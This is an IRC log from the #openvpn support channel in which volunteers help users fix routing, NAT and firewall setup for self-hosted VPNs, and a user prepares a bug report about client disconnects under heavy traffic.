#openvpn 04:59 < pekster> Apparently. You already have pings working, so "access" is relative to what you expect to do 05:00 < discojoe> i need to be able to ssh to server thru vpn 05:00 < discojoe> also access 2 website run on same server 05:00 < FellowTraveler> I've recently set up OpenVPN on a plug server, and I'm using a VPN client to connect to it, which seems to work, but when I go to WhatIsMyIP.com, it shows my actual IP address. Can anyone help me get it working for real? 05:03 < FellowTraveler> I would be able to paypal $50 to whoever is able to help me get it working. 05:03 < FellowTraveler> Or BTC. 05:04 < discojoe> FellowTraveler how do you know its connecting to vpn? 05:04 < discojoe> Can you ping vpn ip? 05:04 < FellowTraveler> I'm connecting with Viscosity and the little thing turns green 05:04 < FellowTraveler> when you say VPN IP, do you mean the external WAN IP ? 05:06 < FellowTraveler> the plug server is on a subnet like 192.168.x.x — The VPN client is on a subnet like 10.x.x.x 05:06 < FellowTraveler> In the VPN server.conf itself, is this sort of addressing: ifconfig 172.31.0.1 172.31.0.2 05:07 < pekster> What's the goal 05:07 < pekster> !goal 05:07 <@vpnHelper> "goal" is Please clearly state your goal for your vpn: example, I would like to access the lan behind the server , I would like to access the internet over my vpn , I just want a secure connection between 2 computers , etc 05:07 < FellowTraveler> I want to use this plug server VPN, so I don't have to pay for VPN service anymore. 05:08 < FellowTraveler> the VPN plug server is at my brother's house in Nevada. When I am surfing the Internet, I want it to appear as if I am at my brother's house in Nevada. 05:08 < FellowTraveler> But when I connect to the VPN server, and then go to whatismyip.com, it shows my actual IP address here, instead of his external WAN address in Nevada. 05:08 < FellowTraveler> . 05:09 < FellowTraveler> I would like to have my own private VPN server, so I don't have to pay any VPN service anymore. These places charge $200 per year and I bought the plug server for $200. 05:09 < FellowTraveler> That way I should never have to use a service again. 05:09 < FellowTraveler> . 05:10 < pekster> First you need a working VPN setup where you can ping the VPN server IP. Then, follow these docs: 05:10 < pekster> !redirect 05:10 <@vpnHelper> "redirect" is (#1) to make all inet traffic flow through the vpn, you will need --redirect-gateway (see !def1), as well as IP forwarding (see !ipforward) and NAT (see !nat) enabled on the server. or (#2) you may need to use a different dns server when redirecting gateway, see !dns or !pushdns or (#3) if using ipv6 try: route-ipv6 2000::/3 or (#4) Handy troubleshooting flowchart: 05:10 <@vpnHelper> http://ircpimps.org/redirect.png 05:10 < pekster> In particular, note the flowchart that guides you through each step you need 05:10 < FellowTraveler> when you say, the VPN server IP, do you mean the external WAN IP for the router where the plug server is located? 05:10 < FellowTraveler> where I opened the UDP port 1194 to forward from the router to the plug server. 05:10 < pekster> No, the IP assigned to the VPN peer. The inside, tunneled IP 05:11 < FellowTraveler> question: if I put this in my server.conf: ifconfig 172.31.0.1 172.31.0.2 05:11 < FellowTraveler> is 172.31.0.1 the IP assigned to the VPN server? 05:12 < pekster> Yup 05:13 < FellowTraveler> okay I definitely can't ping it. 05:13 < pekster> Then your VPN is either incorrectly configured, or you are not allowing the ping request on the server in your firewall 05:14 < FellowTraveler> the only ports that are opened, are 22 and 1194 I believe 05:14 < FellowTraveler> so maybe it's still up, but just ping won't work. 05:14 < pekster> You should fix that 05:14 < FellowTraveler> I can call my brother and open the ping port, but I guess that will have to be another day 05:14 < FellowTraveler> since I am not physically at the location where the server is. 05:15 < pekster> You should generally accept all traffic coming in over the VPN interface unless there's a good reason not to; the only traffic on that interface will be secured VPN traffic 05:17 < FellowTraveler> question: 05:17 < FellowTraveler> if I have this in the server conf: 05:17 < FellowTraveler> ifconfig 172.31.0.1 172.31.0.2 05:17 < FellowTraveler> should I put something similar in client.conf ? 05:17 < FellowTraveler> I'm seeing a warning message in the logs about that being on server side only. 05:17 < FellowTraveler> do I need to reverse the numbers or anything, and put something like that on the client side too ? 05:18 < pekster> That depends on your setup and configured mode of operation. Paste your server config, client config, and the client logs for more details 05:18 < pekster> Or see the official howto that gets you to a functional VPN setup: 05:18 < pekster> !howto 05:18 <@vpnHelper> "howto" is (#1) OpenVPN comes with a great howto, http://openvpn.net/howto PLEASE READ IT! or (#2) http://www.secure-computing.net/openvpn/howto.php for a mirror 05:18 < pekster> In fact, the howto is probably a better place to start 05:18 < pekster> Complete that, and you should end up with a fully functional VPN. You can then add on redirect support as shown earlier 05:20 < FellowTraveler> okay I will do that, but I am pasting these anyway in case you spot something obvious 05:20 < FellowTraveler> server: http://pastebin.com/fcNS1mbK 05:20 < FellowTraveler> client: http://pastebin.com/fsurjJcU 05:21 < FellowTraveler> client log: http://pastebin.com/LTAjYfPj 05:21 < FellowTraveler> . 05:22 -!- dazo is now known as dazo_afk 05:25 -!- Saviq_ [~Saviq@89-70-82-159.dynamic.chello.pl] has joined #openvpn 05:26 < pekster> FellowTraveler: Lots of problems. Your client logs has what are pretty self-explanitory errors on lines 9 & 10 in that log output. You're using ifconfig static addressing on the server but not the client, and the client specifies 'pull' without any relevant push statements from the server 05:26 < pekster> The howto can fix all of that by showing you how to set up a proper setup 05:28 < pekster> Actually, the comp-lzo warning can safely be ignored in this case as the setting on the client is actually the default. It's wise, however, to match that directive on both peers 05:32 < pekster> FellowTraveler, no PMs please for support-realted questions that should be kept in-channel 05:32 < pekster> If you're hell-bent on keeping your current config, you can add a matching 'ifconfig' statement on the client and reverse the IP ordering 05:32 < FellowTraveler> how about the pull ? 05:33 < pekster> No need for the 'pull' in the client, and in fact you should remove it as it conflicts with the 'redirect-gateway' statement on the server (your client has the def1 flag while the push does not) 05:33 < pekster> That, or you should remove that on the client side and push it strictly from the server; both do the same thing, although you probably want def1: 05:33 < pekster> !def1 05:33 <@vpnHelper> "def1" is (#1) used in redirect-gateway, Add the def1 flag to override the default gateway by using 0.0.0.0/1 and 128.0.0.0/1 rather than 0.0.0.0/0. This has the benefit of overriding but not wiping out the original default gateway. or (#2) please see --redirect-gateway in the man page ( !man ) to fully understand or (#3) push "redirect-gateway def1" 05:35 < FellowTraveler> do I still need the static ifconfig, if I fix the push redirect-gateway to include def1 ? 05:35 < FellowTraveler> also, if I fix the push, do I still need the pull? 05:36 < pekster> Remove (or comment out) the push line in your server config. Then you don't need the pull either. That'll fix the discrepency (the long story is that you are pushing that directive, and then overriding it on the client with the same directive but have added that def1 flag, so it takes priority 05:36 < pekster> Use one method or the other: not both at once. 05:37 < FellowTraveler> Also, FYI, I performed these two steps on the server command line: 05:37 < FellowTraveler> echo "1" > /proc/sys/net/ipv4/ip_forward 05:37 < FellowTraveler> iptables -t nat -A POSTROUTING -s 172.31.0.0/24 -o eth0 -j MASQUERADE -v 05:38 < pekster> That's outside the scope of openvpn. Get your connection working first, then worry about redirection. Your firewall also needs to accept the return traffic on the FORWARD chain, although that's also outside the scope of openvpn (a networking or firewall support channel is more appropriate) 05:39 < pekster> You'll probably find helpful hints in the links the bot gave you above that is on-point with firewall config for your setup 05:42 -!- discojoe [~wtf@78.157.218.55] has left #openvpn [] 05:44 -!- nutron [~nutron@unaffiliated/nutron] has quit [Ping timeout: 256 seconds] 05:49 -!- nutron [~nutron@unaffiliated/nutron] has joined #openvpn 05:52 < FellowTraveler> I have to give it to you pekster, the ping is now working to the VPN server! 05:53 < FellowTraveler> unfortunately whatismyip still gives me my actual IP address instead of the VPN server's IP address. Perhaps I should turn the redirect-gateway back on? 05:53 < FellowTraveler> And in that case, I should comment-out the ifconfig ? 05:53 < FellowTraveler> in which case, how will it assign the IP address, since the ifconfig is where I was previously doing that? 05:55 -!- nutron [~nutron@unaffiliated/nutron] has quit [Max SendQ exceeded] 05:58 < pekster> Go re-read what I wrote about that redirect-gateway statement. Then go re-read what the bot told you 05:58 < pekster> If you disabled all occurrances of it, you didn't read carefully enough 05:59 -!- nutron [~nutron@unaffiliated/nutron] has joined #openvpn 06:00 -!- FellowTraveler1 [~Adium@ip72-193-210-165.lv.lv.cox.net] has joined #openvpn 06:01 < FellowTraveler1> basically I commented out the redirect-gateway on the server side, uncommented it on the client side, left the #pull commented on the client side, and put in the ifconfig routes with the numbers reversed like you advised. 06:01 < FellowTraveler1> Then I went to whatismyip.com and it showed me the Nevada IP instead of my actual IP 06:01 < pekster> Client logs report problems adding the route? 06:02 -!- FellowTraveler [~Adium@opentransactions/dev/FellowTraveler] has quit [Ping timeout: 245 seconds] 06:02 < FellowTraveler1> I don't see any, no. 06:02 < pekster> Mac on the client? 06:02 < FellowTraveler1> yes 06:03 < pekster> pastebin output from 'route' 06:03 < pekster> (once the VPN is up) 06:03 < pekster> You left your original client config line for redirect-gateway alone, yes? 06:03 < FellowTraveler1> it's up now, if I type "route" on the terminal it says: usage: route [-dnqtv] command [[modifiers] args] 06:03 < FellowTraveler1> Client: redirect-gateway def1 06:03 < FellowTraveler1> Server: irc://irc.freenode.net:6667/#push "redirect-gateway" 06:04 < FellowTraveler1> oops Server: #push "redirect-gateway" 06:04 < pekster> 'route show' or 'route print' maybe? BSD route is different than my command 06:06 < FellowTraveler1> looks like netstat -r 06:06 < FellowTraveler1> 172.31.0.1 172.31.0.2 UH 77 3 tun0 06:07 < FellowTraveler1> this is also there: 06:07 < FellowTraveler1> 128.0/1 172.31.0.1 UGSc 11 0 tun0 06:07 < FellowTraveler1> lots of others. 06:07 < pekster> Ergo the pastebin 06:07 < FellowTraveler1> very well 06:07 < pekster> 'netstat -rn' preferred for best formatting 06:07 < pekster> (assuming BSD does that... how I'm expecting) 06:08 < FellowTraveler1> http://pastebin.com/JUhkpyG4 06:09 < pekster> Cool, darwin now uses CIDR. I'm mildly impressed. 06:09 < FellowTraveler1> it definitely appears to be working! my traceroutes are going through the plug server 06:09 < pekster> Okay, so the redirect-gateway stuff is getting added (those are the 2 /1 routes) 06:14 -!- ||arifaX [~quassel@unaffiliated/arifax/x-427475] has joined #openvpn 06:15 -!- Mcloven [~Mcloven@ppp203-122-218-215.static.internode.on.net] has quit [Read error: Connection reset by peer] 06:16 -!- Mcloven [~Mcloven@ppp203-122-218-215.static.internode.on.net] has joined #openvpn 06:21 -!- dazo_afk is now known as dazo 06:23 -!- FellowTraveler1 [~Adium@ip72-193-210-165.lv.lv.cox.net] has quit [Ping timeout: 256 seconds] 06:43 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 06:44 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 264 seconds] 06:45 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 06:47 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 06:58 -!- brute11k [~brute11k@89.249.235.210] has quit [Ping timeout: 244 seconds] 07:01 -!- brute11k [~brute11k@89.249.235.210] has joined #openvpn 07:03 -!- master_of_master [~master_of@p57B55327.dip.t-dialin.net] has quit [Read error: Operation timed out] 07:06 -!- master_of_master [~master_of@p57B52F92.dip.t-dialin.net] has joined #openvpn 07:12 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has joined #openvpn 07:18 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 07:18 -!- p3rror [~mezgani@41.248.222.112] has joined #openvpn 07:36 -!- ||arifaX [~quassel@unaffiliated/arifax/x-427475] has quit [Remote host closed the connection] 07:47 -!- hydroxyhydride [~bumblebee@cpe-66-65-132-80.nyc.res.rr.com] has joined #openvpn 07:47 -!- bumblebee [~bumblebee@cpe-66-65-132-80.nyc.res.rr.com] has joined #openvpn 08:27 -!- bumblebee [~bumblebee@cpe-66-65-132-80.nyc.res.rr.com] has quit [Ping timeout: 252 seconds] 08:28 -!- hydroxyhydride [~bumblebee@cpe-66-65-132-80.nyc.res.rr.com] has quit [Ping timeout: 252 seconds] 08:29 -!- Saviq_ [~Saviq@89-70-82-159.dynamic.chello.pl] has quit [Quit: Ex-Chat] 08:33 < kisom> So, how do I create a bug report? 08:33 < kisom> I have an account and everything, but I see no button that allows me to submit a new report. 08:33 < pekster> Should be a "new bug" button 08:33 -!- bumblebee [~bumblebee@cpe-66-65-132-80.nyc.res.rr.com] has joined #openvpn 08:33 -!- hydroxyhydride [~bumblebee@cpe-66-65-132-80.nyc.res.rr.com] has joined #openvpn 08:35 < kisom> Ah yes, found it. Awesome. 08:36 < pekster> I haven't had time to poke at your issue, but if you have a filed bugreport I'll add any findings there if I'm able to reproduce/confirm/analyize code for it 08:36 < kisom> Great. I'm going to do one last attempt at reproducing the bug at a freshly installed machine. Just to be sure. 08:37 < pekster> It helps if you can be very specific about the reproduction, and ideally get any configs demonstrating it down to their most simple form 08:38 < kisom> Yes, my plan is to post complete configuration files that anyone can just run and reproduce the issue with. 08:38 < pekster> Yup, perfect 08:38 < pekster> It makes devs happy when they can just drop in a well-written bugreport and reproduction code and have it show the issue (and that means more likely to get attention) 08:39 < kisom> I assume this should be of major priority. 08:39 < pekster> Details like OS and build number (Windows in particular is up to build I004 now) are possibly also relevant 08:40 < pekster> ovpn build, not win OS build, that is 08:40 < pekster> Yea, if you can reliable crash the client by flooding data, I'd call that a 'major' big 08:40 < pekster> bug* 08:47 -!- s7r [~s7r@openvpn/user/s7r] has joined #openvpn 08:47 -!- mode/#openvpn [+v s7r] by ChanServ 08:50 -!- bumblebee [~bumblebee@cpe-66-65-132-80.nyc.res.rr.com] has quit [Ping timeout: 252 seconds] 08:50 -!- hydroxyhydride [~bumblebee@cpe-66-65-132-80.nyc.res.rr.com] has quit [Ping timeout: 252 seconds] 08:57 -!- kantlivelong [~kantlivel@home.kantlivelong.com] has quit [Ping timeout: 248 seconds] 09:01 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn 09:03 -!- kantlivelong [~kantlivel@home.kantlivelong.com] has joined #openvpn 09:15 -!- krad [~m@212.40.139.131] has joined #openvpn 09:15 -!- krad [~m@212.40.139.131] has quit [Changing host] 09:15 -!- krad [~m@unaffiliated/krad] has joined #openvpn 09:16 -!- krad [~m@unaffiliated/krad] has left #openvpn [] 09:20 -!- digilink [~digilink@unaffiliated/digilink] has quit [Remote host closed the connection] 09:21 -!- digilink [~digilink@unaffiliated/digilink] has joined #openvpn 09:37 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 244 seconds] 09:38 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 09:45 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Ping timeout: 248 seconds] 09:46 -!- dazo is now known as dazo_afk 09:59 -!- emmanuelux [~emmanuelu@94.23.150.162] has joined #openvpn 10:05 -!- dazo_afk is now known as dazo 10:14 -!- kantlivelong [~kantlivel@home.kantlivelong.com] has quit [Ping timeout: 248 seconds] 10:17 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 10:19 -!- kantlivelong [~kantlivel@home.kantlivelong.com] has joined #openvpn 10:47 -!- emmanuelux [~emmanuelu@94.23.150.162] has quit [Ping timeout: 256 seconds] 11:03 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn 11:33 -!- JSharpe [~JSharpe@188.227.181.234] has joined #openvpn 11:38 -!- dazo is now known as dazo_afk 11:39 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Remote host closed the connection] 11:41 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn 11:44 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has quit [Quit: Leaving] 11:57 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Ping timeout: 260 seconds] 12:10 -!- emmanuelux [~emmanuelu@94.23.150.162] has joined #openvpn 12:22 < kisom> pekster: In case you want to try out the bug I've put together client and server configs together with a CA here: https://stormhub.org/dump/vpn-test.tar.gz 12:23 < kisom> Also includes a small script to UDP flood the client machine 12:37 -!- Mcloven_ [~Mcloven@ppp203-122-218-215.static.internode.on.net] has joined #openvpn 12:38 -!- Mcloven [~Mcloven@ppp203-122-218-215.static.internode.on.net] has quit [Read error: Connection reset by peer] 12:43 -!- Saviq_ [~Saviq@89-70-82-159.dynamic.chello.pl] has joined #openvpn 12:44 -!- Cybertinus [~Cybertinu@2001:828:405:30:83:96:177:42] has quit [Read error: Connection reset by peer] 12:46 -!- Devastator- [~devas@177.18.198.44] has joined #openvpn 12:47 -!- Devastator- [~devas@177.18.198.44] has quit [Changing host] 12:47 -!- Devastator- [~devas@unaffiliated/devastator] has joined #openvpn 12:48 -!- Devastator [~devas@unaffiliated/devastator] has quit [Ping timeout: 264 seconds] 12:48 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Read error: Connection reset by peer] 12:48 -!- Saviq_ [~Saviq@89-70-82-159.dynamic.chello.pl] has quit [Ping timeout: 248 seconds] 12:51 -!- Cybertinus [~Cybertinu@2001:828:405:30:83:96:177:42] has joined #openvpn 12:53 -!- Cybertinus [~Cybertinu@2001:828:405:30:83:96:177:42] has quit [Remote host closed the connection] 12:53 -!- Cybertinus [~Cybertinu@2001:828:405:30:83:96:177:42] has joined #openvpn 12:58 -!- Devastator- is now known as Devastator 13:11 -!- baobeiiii [~baobeiiii@192.73.244.224] has joined #openvpn 13:19 <@krzee> kisom, are you able to spoof it? does tls-auth stop you from being able to spoof it? 13:21 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 13:25 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn 13:28 -!- Mcloven_ [~Mcloven@ppp203-122-218-215.static.internode.on.net] has quit [Read error: Connection reset by peer] 13:28 -!- Mcloven [~Mcloven@ppp203-122-218-215.static.internode.on.net] has joined #openvpn 13:34 < kisom> krzee: It's not about spoofing, it's about a decryption issue when the server sends in a faster phase than the client can receive. 13:35 < kisom> Which leads to the client disconnecting from the server. But only in 2.3, not in 2.2. 13:36 -!- Devastator [~devas@unaffiliated/devastator] has quit [Ping timeout: 252 seconds] 13:38 -!- Devastator [~devas@177.18.198.43] has joined #openvpn 13:38 -!- Devastator [~devas@177.18.198.43] has quit [Read error: Connection reset by peer] 13:39 -!- Devastator [~devas@177.18.198.43] has joined #openvpn 13:39 -!- Devastator [~devas@177.18.198.43] has quit [Changing host] 13:39 -!- Devastator [~devas@unaffiliated/devastator] has joined #openvpn 13:44 <@krzee> right, but i wonder if you could do this from a 3rd location 13:44 <@krzee> since udp is connectionless and all 13:45 <@krzee> if you know the client ip, and the server info, can you dos a client's connection with what you found? 13:46 < kisom> krzee: That's not important. If I use redirect-gateway on the client and download something heavy, say a torrent, the client disconnects almost instantly after connecting. 13:46 < kisom> krzee: The UDP flood script is just to show of the bug. 13:48 < kisom> I'll do a proper bug report tomorrow. 13:50 < kisom> But in a nutshell I'm trying to say that if the server tries to deliver more data over the VPN than the connection can handle, the client reports a crypto error and disconnects. 14:07 -!- dazo_afk is now known as dazo 14:11 < dvl> ecrist: Sorry you're not BSDCan'ing this year. Working on a big party. 14:14 -!- ade_b [~Ade@redhat/adeb] has quit [Quit: Too sexy for his shirt] 14:20 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 14:24 -!- ade_b [~Ade@koln-5d817635.pool.mediaWays.net] has joined #openvpn 14:24 -!- ade_b [~Ade@koln-5d817635.pool.mediaWays.net] has quit [Changing host] 14:24 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 14:34 -!- oc80z [oc80z@blea.ch] has joined #openvpn 14:36 -!- goldkatze [~nobody@unaffiliated/goldkatze] has quit [] 14:40 <@krzee> kisom, it might not be important to you, but i would not say it is unimportant if you found a way to stop clients and servers from connecting to eachother 14:45 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Ping timeout: 248 seconds] 14:53 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 15:06 -!- baobeiiii [~baobeiiii@192.73.244.224] has quit [Quit: Leaving] 15:09 -!- merica [~aMERICA@75.111.74.37] has joined #openvpn 15:10 < merica> im having a problem accessing my lan resources through openvpn server setup on openwrt:http://pastebin.com/EN5Z7bRU http://pastebin.com/EYJTLc4m 15:12 < merica> anyone see how i could fix this? 15:20 -!- merica1 [~aMERICA@75.111.74.37] has joined #openvpn 15:20 -!- merica1 [~aMERICA@75.111.74.37] has quit [Read error: Connection reset by peer] 15:20 -!- merica [~aMERICA@75.111.74.37] has quit [Read error: Connection reset by peer] 15:22 -!- merica [~aMERICA@75.111.74.37] has joined #openvpn 15:22 < pekster> merica: I'm guessing a firewall problem, but I really have no clue since the config you've shown is not a netfilter ruleset but the silly abstracted openwrt file that generates them 15:23 < pekster> I threw out both that and the UCI config for openvpn too a long time ago and run things the "proper" way with a flat config file for openvpn and iptables-restore for a clean ruleset 15:23 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 15:23 < pekster> From what I can tell, the server config looks fine assuming 192.168.121.0/24 is the VPN network and 192.168.120.0/24 is the LAN 15:23 < merica> yes 15:24 < pekster> You can ping the VPN server IP from the client end? 15:24 < pekster> 192.168.121.1 ? 15:26 < merica> no 15:27 < pekster> Then your basic connectivity isn't working. If the client doesn't get disconnected with a timeout message, then it's a firewall problem 15:27 < pekster> You need to allow traffic across the VPN adapter and have not done so 15:27 < merica> it says packet filtered actually 15:27 < merica> so 15:28 < pekster> openvpn logs, or something from your kernel/netfilter? 15:34 -!- merica [~aMERICA@75.111.74.37] has quit [Read error: Connection reset by peer] 15:50 -!- Valcorb|| [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 15:50 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [Disconnected by services] 15:51 -!- Valcorb|| is now known as Valcorb 15:53 -!- merica [~aMERICA@75.111.74.37] has joined #openvpn 15:53 -!- Rienzilla [rien@sinas.rename-it.nl] has quit [Ping timeout: 276 seconds] 15:53 -!- Rienzilla [rien@sinas.rename-it.nl] has joined #openvpn 15:56 -!- merica [~aMERICA@75.111.74.37] has quit [Read error: Connection reset by peer] 15:57 -!- ade_b [~Ade@redhat/adeb] has quit [Quit: Too sexy for his shirt] 15:58 -!- merica [~aMERICA@75.111.74.37] has joined #openvpn 16:00 < dropje> !factoids search routing 16:00 <@vpnHelper> No keys matched that query. 16:00 < dropje> !factoids search bridge 16:00 <@vpnHelper> 'bridge-dhcp', 'fbsdbridge', 'bridge-fw', 'bridge', and 'whybridge' 16:00 < dropje> !whybridge 16:00 <@vpnHelper> "whybridge" is (#1) you only bridge if you want layer2 to the lan. if you want layer2 only between vpn nodes then routed tap is enough. if you only want layer3 use tun. or (#2) See this URL for a more in-depth discussion on bridging vs routing: https://community.openvpn.net/openvpn/wiki/BridgingAndRouting 16:02 -!- merica [~aMERICA@75.111.74.37] has quit [Read error: Connection reset by peer] 16:05 -!- merica [~aMERICA@75.111.74.37] has joined #openvpn 16:11 -!- merica [~aMERICA@75.111.74.37] has quit [Ping timeout: 252 seconds] 16:12 -!- merica [~aMERICA@75.111.74.37] has joined #openvpn 16:12 -!- merica [~aMERICA@75.111.74.37] has quit [Read error: Connection reset by peer] 16:13 -!- Valcorb|| [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 16:13 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [Read error: Connection reset by peer] 16:13 -!- Valcorb|| is now known as Valcorb 16:14 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [Client Quit] 16:19 -!- |Mike| [mike@2001:0:53aa:64c:28ac:7181:2b66:b9f1] has quit [Ping timeout: 245 seconds] 16:20 -!- dazo is now known as dazo_afk 16:21 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 16:33 -!- max_ [~max@c-98-225-19-83.hsd1.wa.comcast.net] has joined #openvpn 16:37 -!- max_ [~max@c-98-225-19-83.hsd1.wa.comcast.net] has quit [Remote host closed the connection] 16:40 -!- Valcorb|| [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 16:40 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [Read error: Connection reset by peer] 16:46 -!- Valcorb|| [~Valcorb@d54C68BC0.access.telenet.be] has quit [Read error: Connection reset by peer] 16:54 -!- merica [~aMERICA@75.111.74.37] has joined #openvpn 16:55 -!- jgeboski [~jgeboski@unaffiliated/jgeboski] has quit [Read error: Operation timed out] 16:55 -!- jgeboski [~jgeboski@unaffiliated/jgeboski] has joined #openvpn 16:55 -!- s7r [~s7r@openvpn/user/s7r] has left #openvpn [] 16:56 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 16:58 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Textual IRC Client: http://www.textualapp.com/] 17:02 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 17:16 -!- max_ [~max@c-98-225-19-83.hsd1.wa.comcast.net] has joined #openvpn 17:18 -!- |Mike| [mike@2001:0:53aa:64c:28ac:7181:2b66:b9f1] has joined #openvpn 17:20 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [] 17:22 -!- b00b [~spunk@smurf.mmnetworks.se] has quit [Quit: ZNC - http://znc.in] 17:24 -!- b00b [~spunk@smurf.mmnetworks.se] has joined #openvpn 17:31 -!- merica [~aMERICA@75.111.74.37] has quit [Ping timeout: 252 seconds] 17:33 -!- mezgani_ [~mezgani@41.140.40.237] has joined #openvpn 17:36 -!- p3rror [~mezgani@41.248.222.112] has quit [Ping timeout: 248 seconds] 17:38 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 252 seconds] 17:39 -!- andi [~andi@unaffiliated/fr00d] has left #openvpn [] 17:40 -!- merica [~aMERICA@75.111.74.37] has joined #openvpn 17:40 -!- merica [~aMERICA@75.111.74.37] has quit [Read error: Connection reset by peer] 17:42 -!- merica [~aMERICA@75.111.74.37] has joined #openvpn 17:45 -!- mezgani__ [~mezgani@41.249.97.201] has joined #openvpn 17:48 -!- mezgani_ [~mezgani@41.140.40.237] has quit [Ping timeout: 252 seconds] 17:48 -!- mezgani_ [~mezgani@41.140.24.197] has joined #openvpn 17:49 -!- max_ [~max@c-98-225-19-83.hsd1.wa.comcast.net] has quit [Quit: p33 ba115] 17:50 -!- mezgani__ [~mezgani@41.249.97.201] has quit [Ping timeout: 260 seconds] 18:00 -!- gffa [~unknown@unaffiliated/gffa] has quit [Quit: sleep] 18:28 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [] 18:56 -!- JSharpe [~JSharpe@188.227.181.234] has quit [Quit: Leaving] 19:05 -!- mezgani_ [~mezgani@41.140.24.197] has quit [Quit: Leaving] 19:05 -!- p3rror [~mezgani@41.140.24.197] has joined #openvpn 19:09 -!- p3rror [~mezgani@41.140.24.197] has quit [Read error: Connection reset by peer] 19:11 -!- p3rror [~mezgani@41.140.24.197] has joined #openvpn 19:28 -!- merica [~aMERICA@75.111.74.37] has quit [Quit: Leaving.] 19:39 -!- Saviq_ [~Saviq@89-70-82-159.dynamic.chello.pl] has joined #openvpn 19:54 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 20:04 -!- Devastator [~devas@unaffiliated/devastator] has quit [Ping timeout: 264 seconds] 20:05 -!- Devastator [~devas@177.99.152.50] has joined #openvpn 20:05 -!- Devastator [~devas@177.99.152.50] has quit [Changing host] 20:05 -!- Devastator [~devas@unaffiliated/devastator] has joined #openvpn 20:15 -!- p3rror [~mezgani@41.140.24.197] has quit [Remote host closed the connection] 20:36 -!- dolcea-xoom [~androirc@181.31.66.193] has joined #openvpn 20:37 -!- dolcea-xoom [~androirc@181.31.66.193] has left #openvpn [] 20:52 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 21:17 -!- xkernel [~xkernel@gateway/tor-sasl/xkernel] has joined #openvpn 21:18 < xkernel> I have opevpn on my VPS, I can connect to it and ping and resolve hostnames successfully but can't open websites, the browser just keep on "waiting for response", i'm using tun 21:22 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 21:32 -!- xkernel [~xkernel@gateway/tor-sasl/xkernel] has quit [Ping timeout: 276 seconds] 21:39 -!- xkernel [~xkernel@gateway/tor-sasl/xkernel] has joined #openvpn 21:40 -!- xkernel [~xkernel@gateway/tor-sasl/xkernel] has quit [Remote host closed the connection] 22:07 -!- zhvtar [~zhvtar@unaffiliated/zhvtar] has quit [Ping timeout: 248 seconds] 22:49 -!- n0sq [~quassel@75-135-14-61.dhcp.krny.ne.charter.com] has quit [Remote host closed the connection] 22:49 -!- bjh4 [~bjh4@ool-4357696f.dyn.optonline.net] has joined #openvpn 22:51 < roboman2444> is there a static binary? or way to make a static binary? 22:51 < roboman2444> i have been trying for a while, and i cant compile it completely static 22:56 < EugeneKay> I answered this question yesterday. 23:00 < uberushaximus> Sup EK 23:00 < EugeneKay> Very little. 23:01 < roboman2444> EugeneKay, i musthave not noticed it 23:01 < roboman2444> and my scrollback doesnt go that far back 23:01 < roboman2444> care to copypaste? 23:01 < EugeneKay> Out of my scroll buffer 23:01 < EugeneKay> !irclogs 23:01 <@vpnHelper> "irclogs" is Channel logs are available at http://secure-computing.net/logs/#openvpn.log and http://secure-computing.net/logs/#openvpn-devel.log and are updated every three hours. 23:01 < EugeneKay> ;-) 23:03 < roboman2444> nothing there 23:03 < roboman2444> "refresh for more" 23:04 * EugeneKay blames ecrist 23:07 < roboman2444> probably 23:09 < roboman2444> anyway 23:09 < roboman2444> openvpn has a very complicated makefile system 23:09 < roboman2444> which makes it hard to get it to compile static 23:13 < uberushaximus> 